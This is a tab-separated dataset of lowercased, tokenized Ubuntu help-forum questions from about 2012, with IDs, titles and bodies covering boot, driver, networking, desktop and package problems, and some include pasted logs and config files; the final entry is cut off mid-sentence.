211266	uninstalling dual boot ubuntu 12.04 lts with windows 7	i tried ubuntu and decided windows 7 was good enough for me.i tried to uninstall it but in disk management in windows 7 , i ca n't find the partition for ubuntu . there are hp_tools , os ( c : ) , recovery ( d : ) and system partitions and are all ntfs . my hdd has 250 gb , but it shows only ~230 gbs . i 'm confussed about what 's going on , as i 'm pretty sure i had ubuntu installed , even booted into it a few days back . i even used easeus . shows the same thing as disk management . i 've made a ubuntu live usb . how do i get ubuntu off my laptop ? thanks in advance .
211268	reinstall of windows bootloader not working	it first started when i deleted my partition that had ubuntu 12.04 on it . little did i realize at the time that it would destroy all the resources of grub on it , and subsequently prevent me booting into my hibernated windows 7 . so i made a 12.10 ubuntu live usb and reinstalled windows bootloader . when i rebooted it gave me a bootloader error saying i that it could not find the resources to boot from . so i went back to my live usb and installed boot-repair and tried to repair the mbr . it did n't work though . here is the url the boot-repair gave me if i was in trouble : http : //paste.ubuntu.com/1328309 edit : i have a laptop that has no cd drive so i can not use the windows install disk . also i do n't own the disk : p
211273	lxde - desktop file for opening files in lxterminal	i have a .desktop file in .local/share/applications for opening text files in vim ( console version ) . this works perfectly in gnome , unity . in lxde it fails . i tried using lxterminal in place of gnome-terminal . it opens copy of the file and not the file itself ( when saving , it asks if i want to replace the original file ) . what is wrong ? how can i set it right ? and here is the .desktop file . [ desktop entry ] encoding=utf-8 name=vim text editor ( console ) comment=edit text files in a console using vim # exec=gnome-terminal -- window-with-profile=yaadyaa -- maximize -- execute bash -c `` vim % u '' exec=lxterminal -e vim `` % u '' terminal=true type=application icon=/usr/share/pixmaps/vim.svg categories=application ; utility ; texteditor ; startupnotify=true mimetype=text/plain ; nodisplay=true
211275	how to change ugly gray startup animation screen that kde installed ?	i have ubuntu unity 12.04 installed . i decided to add the kde desktop , just to try it . it changed the startup animation to an ugly gray screen with a squashed logo ( the circular logo is way out of round ) with the moving dots under it . is there an easy way to change it back , or maybe even better , customise it ?
211276	display resolutions missing after upgrade to ubuntu 12-10	i recently upgraded my dual-boot hp laptop ( dv7-3060us , 17.3 '' display ) from ubuntu 12-4 to 12-10 . after the upgrade , only three ( 3 ) resolutions are available ( 800x600 , 1024x768 , and 1152x864 , all 4:3 resolutions ) , none of which are 16:9 . everything worked properly in 12-04 . the display adapter is ati mobility radeon hd 4530 . does anyone have any ideas/suggestions about how to correct this problem ? thanks .
211278	lxpanelctl not working !	lxpanelctl does nothing ! either when i launch it with the keyboard shortcut or from terminal . when i enter lxpanelctl menu or lxpanelctl run in the terminal window , nothing happens . the case is the same when i use the respective keyboard shortcut . what could be wrong ? how can i set it right ?
211281	can not boot wubi installed ubuntu with windows 8	i installed ubuntu on samsung laptop with windows 8 , everything went fine but on booting with ubuntu i get the following message : \ubuntu\winboot\wubildr.mbr status 0xc000007b the application or operating system cold not be loaded because a required file is missing or contains errors . any solutions ? i also can not boot from usb .
211282	ntfs partitions mount as root instead of user as set in /etc/fstab	i recently upgraded a server to ubuntu 12.04 with a fresh install and my ntfs partitions wo n't mount as user at boot but i can mount them as user manually from the console with $ sudo mount -a . using ntfsfix reports no problems and chkdisk sees nothing wrong under windows 7 . are the drives not ready to be mounted at boot and default to root instead of user for some reason ? here is my /etc/fstab : uuid=e4e6b30ce6b2ddcc /media/bowles ntfs-3g defaults , uid=1000 , gid=1000 , umask=022 0 0 uuid=a040c42340c3fdd2 /media/burroughs ntfs-3g defaults , uid=1000 , gid=1000 , umask=022 0 0 uuid=ea022c73022c46c3 /media/doctorgonzo ntfs-3g defaults , uid=1000 , gid=1000 , umask=022 0 0 uuid=ba425a384259fa19 /media/geist ntfs-3g defaults , uid=1000 , gid=1000 , umask=022 0 0 uuid=e87cfae57cfaae06 /media/douglasadams ntfs-3g defaults , uid=1000 , gid=1000 , umask=022 0 0 here is the output of ls -l after boot : drwxr-xr-x 1 xbmc xbmc 4096 oct 31 21:46 bowles drwxrwxr-x 1 root users 8192 oct 31 21:46 burroughs drwxrwxr-x 1 root users 4096 oct 28 21:45 doctorgonzo drwxrwxr-x 1 root users 12288 oct 31 19:56 douglasadams drwxrwxr-x 1 root users 4096 nov 3 01:03 geist if i unmount and mount again with $ sudo mount -a from console , the output of ls -l : drwxr-xr-x 1 xbmc xbmc 4096 oct 31 21:46 bowles drwxr-xr-x 1 xbmc xbmc 8192 oct 31 21:46 burroughs drwxr-xr-x 1 xbmc xbmc 4096 oct 28 21:45 doctorgonzo drwxr-xr-x 1 xbmc xbmc 12288 oct 31 19:56 douglasadams drwxr-xr-x 1 xbmc xbmc 4096 nov 3 01:03 geist update i was fooling myself , i had a custom udev rule set up to auto-mount file systems by label for usb drives , borrowed from here , but did n't update the rule to accommodate for my additional hard drives . updating the rule to auto-mount only drives after /dev/sde solved my problem . thank you again for your reply cartoonist .
211283	ubuntu app developper site is not responding to my submission !	i made a simple application in gambas to replay the cached videos that user has streamed online from firefox . it supports exporting the videos , & erasing the cache . is this application worth adding to the software center ? if yes , how long will it take ? my last submitted app was pending for review forever . so i removed it : ( i do n't want to maintain a ppa for this app . here is the binary file . dependencies : sudo apt-get install gambas2 ffmpeg can somebody figure out is this thing suitable for the submission ? thanks !
211287	video card not detected in steam on wine	i am new to linux and was hoping someone can help me get shogun 2 up and running in steam which was downloaded via playonlinux . currently , the game installs and shows a license screen briefly before it shuts down with no error message . in the system info tab , steam does not seem to detect my video card though the nvidia drivers have been installed and my computer recognizes the card ( geforce gt610 ) . maybe there is another issue though . any help would be most appreciated ! if useful , i have an asus m5a97 motherboard and running ubuntu 12.04 , the system info steam shows follows : processor information : vendor : authenticamd speed : 4200 mhz 4 logical processors 1 physical processors hyperthreading : supported fcmov : supported sse2 : supported sse3 : supported ssse3 : supported sse4a : supported sse41 : supported sse42 : unsupported network information : network speed : operating system version : windows xp ( 32 bit ) wine version : wine-1.4.1 ntfs : supported crypto provider codes : supported 323 0x0 0x0 0x0 video card : driver not detected directx driver name : nv4_disp.dll driver version not detected directx driver version : 6.15.12.6658 driver date not detected directx card : nvidia geforce 8300 gs vendorid : 0x10de deviceid : 0x423 number of monitors : 1 number of logical video cards : 1 no sli or crossfire detected primary display resolution : 1440 x 900 desktop resolution : 1440 x 900 primary display size : 15.00 '' x 9.37 '' ( 17.68 '' diag ) 38.1cm x 23.8cm ( 44.9cm diag ) primary bus type not detected primary vram not detected supported msaa modes : 2x 3x 4x 5x 6x 7x 8x 9x 10x 11x 12x 13x 14x 15x 16x sound card : audio device : memory : ram : 7933 mb miscellaneous : ui language : english microphone : not set media type : cd-rom total hard disk space available : 1861779 mb largest free hard disk block : 720019 mb os install date : may 08 2010 game controller : none detected installed software : adobe flash player 11 plugin microsoft visual c++ 2005 redistributable microsoft visual c++ 2008 redistributable - x86 9.0.21022 microsoft visual c++ 2008 redistributable - x86 9.0.30729.17 sid meier 's civilization v steam the witcher : enhanced edition total war : shogun 2 wine gecko ( 32-bit )
211291	using lxde with kwin window manager	can anybody tell me how i use kwin as my winow manager with lxde .
211292	a terminal which provides select-to-copy and right-click-to-paste	in putty/cygwin my config is : select in console - > copies to clipboard right click - > pastes from clipboard . was after a terminal in linux which might provide me with both of these features ? i have n't been able to find one . any help would be appreciated .
211294	where is ubuntuone gui client on the gnome classic menu ?	alternatively , how can i start the ubuntuone gui client from the terminal ? sorry if this is a dumb question - it seems to me that it should be obvious so probably i am just staring right at it but not seeing it . thanks ...
211295	force gnome 3 to work	i have ubuntu 12.10 on dual-boot with windows xp . my pc specifications are amd sempron 2800+ 1,6ghz with 512 mb ram and ati radeon 9250 graphic card with 128 mb memory . as unity works slow and i do n't like it 's look , i installed gnome-shell . but as you know , gnome 3 wo n't work on it . but gnome classic without effects works great . thing is , when i turn off windows ( by holding the power button or pressing restart button ) my resolution on linux is changed to 1024x768 , and i can only change it by turning off the pc and turning off it 's power source . but it is not the problem . the problem is that it runs gnome 3 after one restart , it also runs better than unity . my question is : can i somehow force gnome 3 to work always and disable some of it 's effects so it can run better ?
211300	how to change the level of animation in ubuntu 12.10 ?	in ubuntu 10.04 there was a special option , which provided you an ability to change an animation level in one click . but it does n't exist in ubuntu 12.04 and 12.10 . which parameters i should change in compiz manager to set the 'extra ' level ? you can see the image of 10.04 :
211308	kodak esp c315 printer	after installing ubuntu 12.04 by replacing my windows vista , i am finding really difficult to install kodak esp c315 all-in-one-printer . both printer and scanner not working . i could not be lucky enough to find any help online and apart from some help with few computer codes . to me it seems impossible to find out the solution as i am not programming expert .
211310	does lubuntu/cups support paper size a3 ?	lubuntu 12.04 / cups / system-config-printer 1.3.8 i have installed an hp officejet 7000 ( using the 7110 driver , because there was no 7000 driver offered ) . there does not seem to be an option to use a3 paper . should there be ?
211311	12.10 wont shut down	i have a brand new acer aspire v5 with windows 7 and 12.10 alongside it . when i shut down 12.10 by clicking on shut down the system restarts , i.e . it shuts right down but instead of powering down it restarts from bios . it does this every time . the only way i can power down from 12.10 is by pressing and holding the power key . any ideas ?
211314	how to install gnome shell themes using gnome tweak tool	lately i 've trying installing themes on ubuntu 12.04 through gnome tweak tool but unfortunately i could n't at last . i just wanted to know whether there is really possible to install themes on ubuntu as few websites claim to be ?
211315	how to keep ubuntu on and unlocked while closing the laptop lid ?	i want to close the laptop lid but not even lock the screen ! i generally use teamviewer from my phone and thus i need my laptop to stay on all the time . though a locked screen can be unlocked but i dont want it to happen by default unless i mannually do it ! also it should not suspend itself at all ! how can i get this done.. i refered this - keep ubuntu server running on a laptop with the lid closed ? but it does not exactly answer my question .
211316	unable to connect to the mts mblaze usb	pceh25en : ~ $ sudo apt-get install wvdial e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? when i happen to install the above code , i 've been displayed with the message stated above . would you please get me the answers to resolve the issue and to connect to internet using the device . i 'm using ubuntu 12.04 even the usb is not showing up . here is some more info , i would like to provide $ sudo wvdialconf editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . modem port scan < *1 > : s0 s1 s2 s3 s4 s5 s6 s7 modem port scan < *1 > : s8 s9 s10 s11 s12 s13 s14 s15 modem port scan < *1 > : s16 s17 s18 s19 s20 s21 s22 s23 modem port scan < *1 > : s24 s25 s26 s27 s28 s29 s30 s31 sorry , no modem was detected ! is it in use by another program ? did you configure it properly with setserial ? please read the faq at http : //alumnit.ca/wiki/ ? wvdial surya @ prominere-vpceh25en : ~ $ sudo wvdialconf editing `/etc/wvdial.conf ' . scanning your serial ports for a modem . modem port scan < *1 > : s0 s1 s2 s3 s4 s5 s6 s7 modem port scan < *1 > : s8 s9 s10 s11 s12 s13 s14 s15 modem port scan < *1 > : s16 s17 s18 s19 s20 s21 s22 s23 modem port scan < *1 > : s24 s25 s26 s27 s28 s29 s30 s31 ttyusb0 < *1 > : atq0 v1 e1 -- ok ttyusb0 < *1 > : atq0 v1 e1 z -- ok ttyusb0 < *1 > : atq0 v1 e1 s0=0 -- ok ttyusb0 < *1 > : atq0 v1 e1 s0=0 & c1 -- ok ttyusb0 < *1 > : atq0 v1 e1 s0=0 & c1 & d2 -- ok ttyusb0 < *1 > : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 -- ok ttyusb0 < *1 > : modem identifier : ati -- manufacturer : qualcomm incorporated ttyusb0 < *1 > : speed 9600 : at -- ok ttyusb0 < *1 > : max speed is 9600 ; that should be safe . ttyusb0 < *1 > : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 -- ok ttyusb1 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttyusb1 < *1 > : atq0 v1 e1 -- failed with 9600 baud , next try : 9600 baud ttyusb1 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . ttyusb2 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttyusb2 < *1 > : atq0 v1 e1 -- failed with 9600 baud , next try : 9600 baud ttyusb2 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . ttyusb3 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttyusb3 < *1 > : atq0 v1 e1 -- failed with 9600 baud , next try : 9600 baud ttyusb3 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . ttyusb4 < *1 > : atq0 v1 e1 -- failed with 2400 baud , next try : 9600 baud ttyusb4 < *1 > : atq0 v1 e1 -- failed with 9600 baud , next try : 9600 baud ttyusb4 < *1 > : atq0 v1 e1 -- and failed too at 115200 , giving up . found a modem on /dev/ttyusb0 . modem configuration written to /etc/wvdial.conf . ttyusb0 < info > : speed 9600 ; init `` atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 '' surya @ prominere-vpceh25en : ~ $ gksudo gedit /etc/wvdial.conf surya @ prominere-vpceh25en : ~ $ sudo wvdial -- > wvdial : internet dialer version 1.61 -- > initializing modem . -- > sending : atz atz ok -- > sending : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 ok -- > modem initialized . -- > configuration does not specify a valid phone number . -- > configuration does not specify a valid login name . -- > configuration does not specify a valid password .
211320	appearance dialog does n't work in 12.04 unity	when i open settings - appearance , there are two problems : i selected color ( non-wallpaper ) background , and is shown as current background . however , the desktop background does not change . there is no launcher icon size slider in the bottom . i see this in 12.04 64 bit unity , running under virtualbox . the same `` parent '' ubuntu works as expected .
211322	memory management in xen	i understand that xen allocates all the physical memory requirement of the guest when started . also it maintain a shadowing page table ( i 'm assuming it uses struct page_info to maintain this . am i correct ? if not can anyone explain ? ) which i wish to access because i need to traverse that list checking whether the guest to which this page is assigned has atleast accessed it once . can anyone explain me how i can acheive this ?
211324	ubuntu sluggish and graphics problem after nvidia driver update	i just recently started using ubuntu ( 12.04 ) since a few weeks ago and noticed that the interface is very slow and sluggish : on dash , i have to type the entire app name and wait a few seconds before it shows up in the search box , and a bit later before it displays search result opening new files or applications takes also quite long and awkward dragging icons or moving app windows around is not very spontaneous too : i have to take extra attention in moving the mouse otherwise ubuntu would not do a correct movement or might ends up doing something incorrect instead e.g . opening the windows to full screen options or move the file to different folders , which is frustrating my pc is a few years old already ( 1.7 gb ram ) so this could be a reason too but when i checked in system monitor it 's hardly ever consuming much memory . plus web-surfing on firefox is actually lightning fast ( much more than windows ) , so i suspect there might be something wrong with the graphics driver ( mine is geforce 7050 ) . i checked around system settings and found an option to update the nvidia driver . so i tried it and restarted , as instructed . now , i got into a big problem upon restart ... as the login-screen windows ( where i have to type in the password ) would take several attempts to display and finally did not manage to ( it 'd freeze for several seconds before there 's any movement again ) . the background screen also kept reloading several times too and at some point the screen turned black with pixelated color strips running on the bottom 1/3 of the screen , and after a long while the background screen would come up again . eventually i 'd manage to be able to access the desktop but the launcher , top menu bar and app windows border would not disappear . i searched around and found many other people have this similar problem after updating nvidia driver too , and on some threads the suggestion is to use `` killall -u $ user '' in command line ( it 's the only thing among various online suggestions i could do , as at that point i could not access terminal without the launcher - ctrl-alt-t does n't work for me ) . so i did that and was able to access the desktop correctly again with launchee/menu by creating a new account . but i would still have the same problem if logging into my original account . so i just finally tried upgrading to 12.10 and now can access my original account with fully-functional desktop - the launcher , menu and windows border are all back now . however , the problem with sluggishness still remains . and now i get scared of ever having to update the nvidia driver again ! i wonder if anyone knows what 's the reason that updating the nvidia driver is causing this problem and is there a way i can update it safely in the future ? i 'm still not sure how to solve the problem with the sluggishness too and not sure where else to look to find a solution .
211325	how to set pcmanfm as the default file manager ?	i think nautilus is so slow , and i 'd like to move to pcmanfm , but did n't find any good tips how to do this in ubuntu 12.10 . i have pcmanfm installed already , and i even changed : $ sudo gedit /usr/share/applications/nautilus-folder-handler.desktop [ desktop entry ] name=files comment=access and organize files exec=pcmanfm % u icon=system-file-manager terminal=false nodisplay=true type=application startupnotify=true onlyshowin=gnome ; unity ; categories=gnome ; gtk ; utility ; core ; mimetype=inode/directory ; application/x-gnome-saved-search ; x-gnome-bugzilla-bugzilla=gnome x-gnome-bugzilla-product=nautilus x-gnome-bugzilla-component=general x-gnome-bugzilla-version=3.2.1 x-ubuntu-gettext-domain=nautilus still slow nautilus is default one .
211330	has anyone who took part in the app showdown gotten the promised t-shirt ?	the title says all . on the contest site http : //developer.ubuntu.com/showdown/ there 's statement `` every submitted app also gets an ubuntu t-shirt ! '' . i have n't received anything so far . -- -- -- -- -- -- -- -- edit -- -- -- -- -- -- - just received ubuntu t-shirt ! thanks @ david planella !
211334	stardict config is not working	i set stardict to autostart at startup with option -h ( hidden mode ) and set scanning key to alt+ctrl ( translates word if select text and press alt+ctrl ) . my problem is sometimes stardict 's config is not working ( alt+ctrl is not working seem like program did n't read config ) . i checked on ~/.stardict/stardict.cfg every thing looked ok . the problem seems like stardict had ran before reading a config file .
211336	ubuntu 12.10 excess boot time	i recently upgraded from ubuntu 12.04 to 12.10 . but it takes almost forever to boot and show the log on screen . is it natural ? my bootchart report http : //i.stack.imgur.com/d1unn.png
211338	go to the parent directory in files/nautilus ubuntu 12.10	in ubuntu 12.10 ( gnome3 ) they 've removed the `` go to parent directory '' using backspace . i was very used to it ... i 've seen in source code comments that they 've removed this support and there are at least 3 other ways of achieving the same . i wonder - what are other ways besides the alt + up ? basically , i 'd like to find out how to enable the backspace key to go to the parent directory or at least know the shortcut for doing it with one hand ( alt + up is useless ) .
211339	`` invalid efi file path '' while booting windows	i just got my new working notebook with windows 8 pre-installed . after installing ubuntu 12.10 the grub menu says that there is an `` invalid efi file path '' and it wo n't boot windows . ubuntu works fine ... is there anything i can do about this ?
211344	form controls control option not working	i want to insert a check box but when i try to right click the control and choose control nothing happens . i tried many things including changing the control but no success . can you fix it or send a link to make it work so i can download from my ubuntu software centre thanks .
211346	.viminfo owned by root ?	the .viminfo file in my home directory is owned by root . could anyone please explain how that could have happened without me asking it ? $ ls -la | grep .viminfo -rw -- -- -- - 1 root root 4175 nov 3 19:11 .viminfo
211347	networkmanager refuses to manage my wlan interface	i 'm using ubuntu 12.10 with gnome 3.6 on a brand-new samsung np900x4c . the installer detected the wireless adapter , took in the ssid and wpa passphrase , wrote these into /etc/network/interfaces and connected perfectly . once installation was finished i wanted to switch to using networkmanager to manage the wireless adapter , since this is much more convenient than fiddling with /etc/network/interfaces every time i find a new hotspot . therefore i edited /etc/networkmanager/networkmanager.conf to set : [ ifupdown ] managed=true when i rebooted networkmanager , the problems started : - the networkmanager tray applet changed from saying device not managed to device not ready - i lost all internet connectivity as wlan0 would not associate to the access point - if i set managed=false in networkmanager.conf and restarted both networkmanager and networking services from the command-line , the gnome desktop `` semi-crashed '' and lost all its window decorations , the panel , the launcher and basically became unusable . however if i restart the computer completely after setting managed=false , wlan0 once again works perfectly .
211349	wireless stops working on an msi u180 netbook	i 'm having trouble with wifi on my msi u180 netbook using 12.04 . when i boot up the netbook , it will connect to my router , however , after a few minutes the wifi will just stop working and not find or connect to any networks . the only way to get wifi connectivity back is to reboot the netbook , however , the connection will again only last a few minutes . a wired connection works fine . i have tried connecting to a different router and the same thing happens . my friend has the same os and netbook and his works fine . does anybody have any possible solutions ?
211351	dash background ( when no blur ) after upgrade	i have a problem : i do n't like the blur effect in dash , so i turned it off in ccsm . before the upgrade , everything was ok , but now dash uses lower part of the screen as a background . it 's not correct . take a look : the same thing happens when i hold the super key . when i turn on blur , its ok , but launching dash is longer ( and i just dont like blur effect ) .
211354	unable to locate package libopenmpi-dev on 12.04	while trying to install open mpi on my ubuntu 12.04 , i am getting error unable to locate package libopenmpi-dev . what to do ? $ sudo apt-get install libopenmpi-dev openmpi-bin openmpi-doc unable to locate package libopenmpi-dev unable to locate package openmpi-bin unable to locate package openmpi-doc
211355	how to send messages on lan running on windows and ubuntu	in windows , we can send messages on same lan using the net send command , but how to do this in ubuntu ?
211363	uninstall ubuntu 12.10 installed via wubi	i installed ubuntu 12.04 lts and later uninstalled it succesfully . now again installed ubuntu 12.10 but i get messsage installer crashed , when reported it comes as third party items involved , not official , so ca n't report . so i decided to uninstall it to start from first , but after uninstalling , i get both ubuntu and windows options while switching on pc .
211364	epson printer xp405wh	i am trying to find a printer that will run with my ubuntu 11.04 installation and , having just been to my local pcworld store . ( wonder if this epson printer will run with ubuntu ) i already have a lexmark 1480 printer but there is no ubuntu compatible for this printer so i need another one .
211369	monitor displays `` no vga signal '' `` check dvi cable '' after installing motherboard drivers	i bought computer with all of the needed parts , got everything sorted out , installed windows 7 but my cd-rom does n't fit my motherboard . so i had to download the driver manually and install it using usb disc . my motherboard : ecs elitegroup h61h2-m2 , i downloaded it 's drivers , installed the bios map or something , and then the computer forced a reboot after it was complete , after the reboot my monitor just stopped working and displayed no vga signal , no dvi cable i think i 've just installed the wrong driver , well but how can i sort it out ? this is the driver i installed . on the book , it tells me to install the drivers , without the driver it wo n't see the internet connection cable . i 'm 100 % sure there is nothing wrong with the monitor or it 's cables . it stopped working exactly after the reboot after the installation .
211370	no wireless connectivity after installing ubuntu 12.10 on windows 8	i am new to ubuntu/linux . i have installed the ubuntu 12.10 version on windows 8 . after installation , there is no wireless connectivity . i have searched the forums and tried things that have worked for others . but , every way seems to be a dead-end to me . i ran the command lspci -nn | grep 0280 and here is the details i get . 03:00.0 network controller [ 0280 ] : broadcom corporation bcm43228 802.11a/b/g/n [ 14e4:4359 ] the command sudo iwconfig gives the below output . eth0 no wireless extensions . lo no wireless extensions . i downloaded the bcmwl-kernel-source from ubuntu software center and installed , but there is no change . i am at a loss , being new to the os . any help from you will be much appreciated . kindly let me know if i missed to provide any information .
211381	how do i set ubuntu bold font as the window titlebar font ?	i 've made a fresh ubuntu 12.10 install and the ubuntu bold font is missing from the font selection screens . this means that if i try to use ubuntu tweak to set the title font for windows as `` ubuntu bold '' it does not appear as a choice . the actual file is present in /usr/share . if i use the font in writer , for example , i can set it to bold without issues . i 've tried fc-cache -frv but that 's the only thing i can think of .
211394	thunderbird and gmail connection error	in morning thunderbird was working fine and in evening it started displaying annoying message that it ca n't connect to my gmail account . although im able to access my account through web interface but can access it using mail client . any suggestions
211396	can not connect with huawei e173 after upgrade to 12.10 using network manager	since upgrade from 12.04 to 12.10 i ca n't connect to internet using mobile broadband modem huawei e173 . it worked earlier without problems and now it seems to be properly recognized ( at least its connections appear in network manager applet ) , and after selecting connection manually it starts connection procedure . after about 20 seconds it returns to state disconnected . after browsing internet i 've found that running network manager with : nm_ppp_debug=1 /usr/sbin/networkmanager -- no-daemon after inserting modem i get : networkmanager [ 507 ] : < warn > ( ttyusb2 ) : failed to look up interface index networkmanager [ 507 ] : < info > ( ttyusb2 ) : new gsm/umts device ( driver : 'option1 ' ifindex : 0 ) networkmanager [ 507 ] : < info > ( ttyusb2 ) : exported as /org/freedesktop/networkmanager/devices/2 networkmanager [ 507 ] : < info > ( ttyusb2 ) : now managed networkmanager [ 507 ] : < info > ( ttyusb2 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] networkmanager [ 507 ] : < info > ( ttyusb2 ) : deactivating device ( reason 'managed ' ) [ 2 ] networkmanager [ 507 ] : < info > ( ttyusb2 ) : device state change : unavailable - > disconnected ( reason 'none ' ) [ 20 30 0 ] where 'failed to look up interface index ' seems to be suspicious . after starting connecting : networkmanager [ 507 ] : < info > activation ( ttyusb2 ) starting connection 'plus - dostäp standardowy' networkmanager [ 507 ] : < info > ( ttyusb2 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 1 of 5 ( device prepare ) scheduled ... networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 1 of 5 ( device prepare ) started ... networkmanager [ 507 ] : < info > ( ttyusb2 ) : device state change : prepare - > need-auth ( reason 'none ' ) [ 40 60 0 ] networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 1 of 5 ( device prepare ) complete . networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 1 of 5 ( device prepare ) scheduled ... networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 1 of 5 ( device prepare ) started ... networkmanager [ 507 ] : < info > ( ttyusb2 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 1 of 5 ( device prepare ) complete . networkmanager [ 507 ] : < info > wwan now enabled by management service networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 2 of 5 ( device configure ) scheduled ... networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 2 of 5 ( device configure ) starting ... networkmanager [ 507 ] : < info > ( ttyusb2 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 2 of 5 ( device configure ) successful . networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 3 of 5 ( ip configure start ) scheduled . networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 2 of 5 ( device configure ) complete . networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 3 of 5 ( ip configure start ) started ... networkmanager [ 507 ] : < info > ( ttyusb2 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] networkmanager [ 507 ] : < info > starting ppp connection networkmanager [ 507 ] : < info > pppd started with pid 663 networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 3 of 5 ( ip configure start ) complete . networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 4 of 5 ( ipv6 configure timeout ) started ... networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 4 of 5 ( ipv6 configure timeout ) complete . plugin /usr/lib/pppd/2.4.5/nm-pppd-plugin.so loaded . ** message : nm-ppp-plugin : ( plugin_init ) : initializing ** message : nm-ppp-plugin : ( nm_phasechange ) : status 3 / phase 'serial connection' removed stale lock on ttyusb2 ( pid 32146 ) using channel 23 networkmanager [ 507 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) networkmanager [ 507 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . networkmanager [ 507 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... using interface ppp0 connect : ppp0 < -- > /dev/ttyusb2 ** message : nm-ppp-plugin : ( nm_phasechange ) : status 5 / phase 'establish' sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x64b4024a > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x64b4024a > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x64b4024a > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x64b4024a > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x64b4024a > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x64b4024a > < pcomp > < accomp > ] sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x64b4024a > < pcomp > < accomp > ] networkmanager [ 507 ] : < warn > pppd timed out or did n't initialize our dbus module networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 4 of 5 ( ipv4 configure timeout ) started ... networkmanager [ 507 ] : < info > ( ttyusb2 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] networkmanager [ 507 ] : < warn > activation ( ttyusb2 ) failed for connection 'plus - dostäp standardowy' networkmanager [ 507 ] : < info > activation ( ttyusb2 ) stage 4 of 5 ( ipv4 configure timeout ) complete . networkmanager [ 507 ] : < info > ( ttyusb2 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] networkmanager [ 507 ] : < info > ( ttyusb2 ) : deactivating device ( reason 'none ' ) [ 0 ] terminating on signal 15 ** message : nm-ppp-plugin : ( nm_phasechange ) : status 10 / phase 'terminate' sent [ lcp termreq id=0x2 `` user request '' ] networkmanager [ 507 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) where repeated : sent [ lcp confreq id=0x1 < asyncmap 0x0 > < magic 0x64b4024a > < pcomp > < accomp > ] last for about 20 seconds . i 've tried to downgrade network manager but failed due to many dependencies . can anyone point me to solution or tell what should i do to further investigate the problem ?
211397	ca n't run apt-get upgrade - getting stuck in reading logs ?	i 'm trying to run an apt-get upgrade ( after first running apt-get update ) , but my ubuntu 12.04 server is n't completeing the upgrade process . it asks me if i want to upgrade 6 available packages , then it says it 's reading the logs , and then i believe nano opens and shows the following : get:1 changelog for base-files ( http : //changelogs.ubuntu.com/changelogs/pool/main/b/base-files/base-files_6.5ubuntu6.4/changelog ) [ 78.4 kb ] base-files ( 6.5ubuntu6.4 ) precise ; urgency=low mark /etc/os-release as a conffile , and migrate it in the preinst for the benefit of people who tested the previous precise version -- adam conrad tue , 23 oct 2012 22:52:07 +0100 base-files ( 6.5ubuntu6.3 ) precise-proposed ; urgency=low install /etc/os-release . lp : # 947236 . -- matthias klose tue , 09 oct 2012 19:36:33 +0200 get:1 changelog for libudev0 ( http : //changelogs.ubuntu.com/changelogs/pool/main/u/udev/udev_175-0ubuntu9.2/changelog ) [ 156 kb ] udev ( 175-0ubuntu9.2 ) precise-proposed ; urgency=low add persistent-input-symlinks-iface00.patch : fix persistent input symlinks for interface 00 . thanks to a7x for pointing this out ! ( lp : # 1057824 ) -- martin pitt thu , 11 oct 2012 09:17:05 +0200 /tmp/tmpu6dn1w ( end ) i can only exit out of that using control-c , and once i 'm back where i can enter commands i 